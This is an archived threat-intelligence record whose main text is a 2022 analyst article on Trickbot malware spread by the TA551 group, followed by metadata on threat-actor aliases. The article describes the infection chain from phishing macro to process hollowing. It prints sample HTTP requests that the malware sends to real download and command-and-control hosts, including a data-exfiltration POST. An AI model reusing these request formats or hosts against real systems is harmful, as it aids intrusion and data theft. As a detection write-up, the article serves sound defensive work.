{
	"id": "09b57e23-d3e1-4550-9a4a-006a5f8fb10a",
	"created_at": "2026-04-06T00:09:31.946251Z",
	"updated_at": "2026-04-10T13:11:24.664032Z",
	"deleted_at": null,
	"sha1_hash": "a8c815f4d386e3f721362269349def2b12027177",
	"title": "Malware Analysis: Trickbot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 180067,
	"plain_text": "Malware Analysis: Trickbot\r\nBy The Hacker News\r\nPublished: 2022-05-24 · Archived: 2026-04-05 20:11:34 UTC\r\nIn this day and age, we are no longer dealing with roughly pieced-together, homebrew viruses. Malware is an industry, and professional developers exchange code, whether by stealing it from one another or through deliberate collaboration. Attacks are multi-layered these days, with diverse, sophisticated software components taking over different jobs along the attack chain, from initial compromise to ultimate data exfiltration or encryption. The specific tools for each stage are highly specialized and can often be rented as a service, including customer support and subscription models for professional (ab)use. Obviously, this has greatly increased both the availability and the potential effectiveness and impact of malware. Sound scary?\r\nWell, it does, but the apparent professionalization also has some good sides. One factor is that certain reused modules commonly found in malware can be used to identify, track, and analyze professional attack software. 
Ultimately this means that, with enough experience, skilled analysts can detect and stop malware in its tracks, often with minimal or no damage (if the attackers make it through the first lines of defense at all).\r\nLet's see this mechanic in action as we follow an actual CyberSOC analyst investigating the case of the malware dubbed \"Trickbot.\"\r\nOrigins of Trickbot\r\nOrange Cyberdefense's CyberSOCs have been tracking the specific malware named Trickbot for quite some time. It is commonly attributed to a specific threat actor generally known under the name Wizard Spider (Crowdstrike), UNC1778 (FireEye) or Gold Blackburn (Secureworks).\r\nhttps://thehackernews.com/2022/05/malware-analysis-trickbot.html\r\nPage 1 of 5\n\nTrickbot is a popular, modular Trojan initially used to target the banking industry that has since been used to compromise companies in other industries as well. It delivers several types of payloads. Trickbot progressively evolved into a Malware-as-a-Service (MaaS) offering used by different attack groups.\r\nThe threat actor behind it is known to act quickly, using the well-known post-exploitation tool Cobalt Strike to move laterally across the company's network infrastructure and deploy ransomware like Ryuk or Conti as a final stage. As it is used for initial access, being able to detect this threat as quickly as possible is a key element of success in preventing further attacks.\r\nThis threat analysis focuses on the threat actor named TA551 and its use of Trickbot as an example. I will present how we are able to perform detection at the different steps of the kill chain, starting from the initial infection through malspam campaigns and moving on to the detection of tools used by the threat actor during compromise. 
We will also provide some additional information about how the threat actor is using this malware and how it has evolved.\r\n1 — Initial access\r\nSince June 2021, the group TA551 has been delivering the Trickbot malware using an encrypted zip. The email pretext mimics important information to lower the user's vigilance.\r\nThe attachment is a .zip file which in turn contains a document. The zip file always uses the same name, \"request.zip\" or \"info.zip\", and the same name for the document file.\r\nNB: The threat actor used the same modus operandi before and in parallel to Trickbot to deliver other malware. During the same period, from June 2021 to September 2021, we observed the use of Bazarloader as the initial access payload.\r\n2 — Execution\r\nWhen the user opens the document with macros enabled, an HTA file is dropped on the system and launched using cmd.exe. The HTA file is used to download the Trickbot DLL from a remote server.\r\nThis behavior is related to TA551; we can identify it by the pattern \"/bdfh/\" in the GET request.\r\nGET /bdfh/M8v[..]VUb HTTP/1.1\r\nAccept: */*\r\nHost: wilkinstransportss.com\r\nContent-Type: application/octet-stream\r\nNB: Patterns related to TA551 evolved with time; since mid-August 2021, the pattern has changed to \"/bmdff/\". The DLL is saved with a .jpg extension to hide its real file type, and it attempts to run via regsvr32.exe. Then, Trickbot is injected into \"wermgr.exe\" using process hollowing techniques.\r\nFigure 1 - Trickbot execution in the sandbox\r\n3 — Collection\r\nAfter the successful initial system compromise, Trickbot can collect a lot of information about its target using legitimate Windows executables and identify whether the system is a member of an Active Directory domain. 
\r\nIn addition to this collection, Trickbot gathers further details such as the Windows build, the public IP address, the user running Trickbot, and whether the system is behind a NAT firewall.\r\nTrickbot is also able to collect sensitive information like banking data or credentials and exfiltrate it to a dedicated command and control server (C2).\r\n4 — Command \u0026 Control\r\nWhen the system is infected, it can contact several kinds of Trickbot C2. The main C2 is the one with which the victim system communicates, mainly to get new instructions.\r\nAll requests to a Trickbot C2 use the following format:\r\n\"/\u003cgtag\u003e/\u003cClient_ID\u003e/\u003ccommand\u003e/\u003cadditional information about the command\u003e/\"\r\nGET /zev4/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787/0/Windows 10 x64/1108/XX.XX.XX.XX/38245433F0E3D5689F6EE84483106F4382CC92EAFAD51206571D97A519A2EF29/0bqjxzSOQUSLPRJMQSWKDHTHKEG/ HTTP/1.1\r\nConnection: Keep-Alive\r\nUser-Agent: curl/7.74.0\r\nHost: 202.165.47.106\r\nAll data collected is sent to a separate exfiltration Trickbot C2 using HTTP POST requests. 
The request format stays the same, but the command \"90\" is specific to data exfiltration, more precisely system data collected from the infected system.\r\nPOST /zev4/56dLzNyzsmBH06b_W10010240.42DF9F315753F31B13F17F5E731B7787/90/ HTTP/1.1\r\nConnection: Keep-Alive\r\nContent-Type: multipart/form-data; boundary=------Boundary0F79C562\r\nUser-Agent: Ghost\r\nHost: 24.242.237.172:443\r\nFollow-up attacks: Cobalt Strike, Ryuk, Conti\r\nCobalt Strike[1] is a commercial, fully-featured remote access tool that calls itself an \"adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors\". Cobalt Strike's interactive post-exploitation capabilities cover the full range of ATT\u0026CK tactics, all executed within a single, integrated system.\r\nIn our context, Trickbot uses the hijacked wermgr.exe process to load a Cobalt Strike beacon into memory.\r\nSeveral ransomware operators are affiliated with the threat actors as well. The aim of Trickbot is to perform the initial access preceding the actual ransomware attack. Conti and Ryuk are the main ransomware families observed in the final stage of Trickbot infections, though by far not the only ones. Conti is a group that operates a Ransomware-as-a-Service model and is available to several affiliate threat actors. Ryuk, on the other hand, is a ransomware that is linked directly to the threat actor behind Trickbot.\r\nKey learnings\r\nThreat actors often still use basic techniques like phishing emails to get into the network. Raising awareness about phishing is definitely a great first step in building up cyber resilience. The best attacks are, after all, the ones that never even get started.\r\nOf course, there is no such thing as bullet-proof preventive protection in cyber. It's all the more important to have the capability to detect Trickbot at an early stage. 
Though the attack chain can be broken at any stage along the way, the later it is broken, the higher the risk of full compromise and the resulting damage. Trickbot is used by different threat actors, but the detection approach stays the same for most of its specific stages. Some of the indicators of compromise are explained here. But malware gets updates too.\r\nAnalysts have to stay vigilant. Tracking a specific malware family or threat actor is key to following its evolution and improvements and to keeping detection of the threat effective and up to date.\r\nThis is a story from the trenches found in the Security Navigator. More malware analysis and other interesting material, including accounts of emergency response operations and a criminal scientist's view on cyber extortion, as well as tons of facts and figures on the security landscape in general, can be found there as well. The full report is available for download on the Orange Cyberdefense website, so have a look. It's worth it!\r\n[1] MITRE ATT\u0026CK Cobalt Strike: https://attack.mitre.org/software/S0154/\r\nThis article was written by Florian Goutin, CyberSOC analyst at Orange Cyberdefense.\r\nThis article is a contributed piece from one of our valued partners.\r\nSource: https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://thehackernews.com/2022/05/malware-analysis-trickbot.html"
	],
	"report_names": [
		"malware-analysis-trickbot.html"
	],
	"threat_actors": [
		{
			"id": "26a04131-2b8c-4e5d-8f38-5c58b86f5e7f",
			"created_at": "2022-10-25T15:50:23.579601Z",
			"updated_at": "2026-04-10T02:00:05.360509Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"TA551",
				"GOLD CABIN",
				"Shathak"
			],
			"source_name": "MITRE:TA551",
			"tools": [
				"QakBot",
				"IcedID",
				"Valak",
				"Ursnif"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f6f91e1c-9202-4497-bf22-9cd5ef477600",
			"created_at": "2023-01-06T13:46:38.86765Z",
			"updated_at": "2026-04-10T02:00:03.12735Z",
			"deleted_at": null,
			"main_name": "WIZARD SPIDER",
			"aliases": [
				"TEMP.MixMaster",
				"GOLD BLACKBURN",
				"DEV-0193",
				"UNC2053",
				"Pistachio Tempest",
				"DEV-0237",
				"Storm-0230",
				"FIN12",
				"Periwinkle Tempest",
				"Storm-0193",
				"Trickbot LLC"
			],
			"source_name": "MISPGALAXY:WIZARD SPIDER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bc119938-a79c-4e5f-9d4d-dc96835dfe2e",
			"created_at": "2024-06-04T02:03:07.799286Z",
			"updated_at": "2026-04-10T02:00:03.606456Z",
			"deleted_at": null,
			"main_name": "GOLD BLACKBURN",
			"aliases": [
				"ITG23 ",
				"Periwinkle Tempest ",
				"Wizard Spider "
			],
			"source_name": "Secureworks:GOLD BLACKBURN",
			"tools": [
				"BazarLoader",
				"Buer Loader",
				"Bumblebee",
				"Dyre",
				"Team9",
				"TrickBot"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "40b623c7-b621-48db-b55b-dd4f6746fbc6",
			"created_at": "2024-06-19T02:03:08.017681Z",
			"updated_at": "2026-04-10T02:00:03.665818Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shathak",
				"TA551 "
			],
			"source_name": "Secureworks:GOLD CABIN",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "90f216f2-4897-46fc-bb76-3acae9d112ca",
			"created_at": "2023-01-06T13:46:39.248936Z",
			"updated_at": "2026-04-10T02:00:03.260122Z",
			"deleted_at": null,
			"main_name": "GOLD CABIN",
			"aliases": [
				"Shakthak",
				"TA551",
				"ATK236",
				"G0127",
				"Monster Libra"
			],
			"source_name": "MISPGALAXY:GOLD CABIN",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "63061658-5810-4f01-9620-7eada7e9ae2e",
			"created_at": "2022-10-25T15:50:23.752974Z",
			"updated_at": "2026-04-10T02:00:05.244531Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"Wizard Spider",
				"UNC1878",
				"TEMP.MixMaster",
				"Grim Spider",
				"FIN12",
				"GOLD BLACKBURN",
				"ITG23",
				"Periwinkle Tempest",
				"DEV-0193"
			],
			"source_name": "MITRE:Wizard Spider",
			"tools": [
				"TrickBot",
				"AdFind",
				"BITSAdmin",
				"Bazar",
				"LaZagne",
				"Nltest",
				"GrimAgent",
				"Dyre",
				"Ryuk",
				"Conti",
				"Emotet",
				"Rubeus",
				"Mimikatz",
				"Diavol",
				"PsExec",
				"Cobalt Strike"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "e6a21528-2999-4e2e-aaf4-8b6af14e17f3",
			"created_at": "2022-10-25T16:07:24.422115Z",
			"updated_at": "2026-04-10T02:00:04.983298Z",
			"deleted_at": null,
			"main_name": "Wizard Spider",
			"aliases": [
				"DEV-0193",
				"G0102",
				"Gold Blackburn",
				"Gold Ulrick",
				"Grim Spider",
				"ITG23",
				"Operation BazaFlix",
				"Periwinkle Tempest",
				"Storm-0230",
				"TEMP.MixMaster",
				"Wizard Spider"
			],
			"source_name": "ETDA:Wizard Spider",
			"tools": [
				"AdFind",
				"Agentemis",
				"Anchor_DNS",
				"BEERBOT",
				"BazarBackdoor",
				"BazarCall",
				"BazarLoader",
				"Cobalt Strike",
				"CobaltStrike",
				"Conti",
				"Diavol",
				"Dyranges",
				"Dyre",
				"Dyreza",
				"Dyzap",
				"Gophe",
				"Invoke-SMBAutoBrute",
				"KEGTAP",
				"LaZagne",
				"LightBot",
				"PowerSploit",
				"PowerTrick",
				"PsExec",
				"Ryuk",
				"SessionGopher",
				"TSPY_TRICKLOAD",
				"Team9Backdoor",
				"The Trick",
				"TheTrick",
				"Totbrick",
				"TrickBot",
				"TrickLoader",
				"TrickMo",
				"Upatre",
				"bazaloader",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "04e34cab-3ee4-4f06-a6f6-5cdd7eccfd68",
			"created_at": "2022-10-25T16:07:24.578896Z",
			"updated_at": "2026-04-10T02:00:05.039955Z",
			"deleted_at": null,
			"main_name": "TA551",
			"aliases": [
				"G0127",
				"Gold Cabin",
				"Monster Libra",
				"Shathak",
				"TA551"
			],
			"source_name": "ETDA:TA551",
			"tools": [
				"BokBot",
				"CRM",
				"Gozi",
				"Gozi CRM",
				"IceID",
				"IcedID",
				"Papras",
				"Snifula",
				"Ursnif",
				"Valak",
				"Valek"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434171,
	"ts_updated_at": 1775826684,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a8c815f4d386e3f721362269349def2b12027177.pdf",
		"text": "https://archive.orkl.eu/a8c815f4d386e3f721362269349def2b12027177.txt",
		"img": "https://archive.orkl.eu/a8c815f4d386e3f721362269349def2b12027177.jpg"
	}
}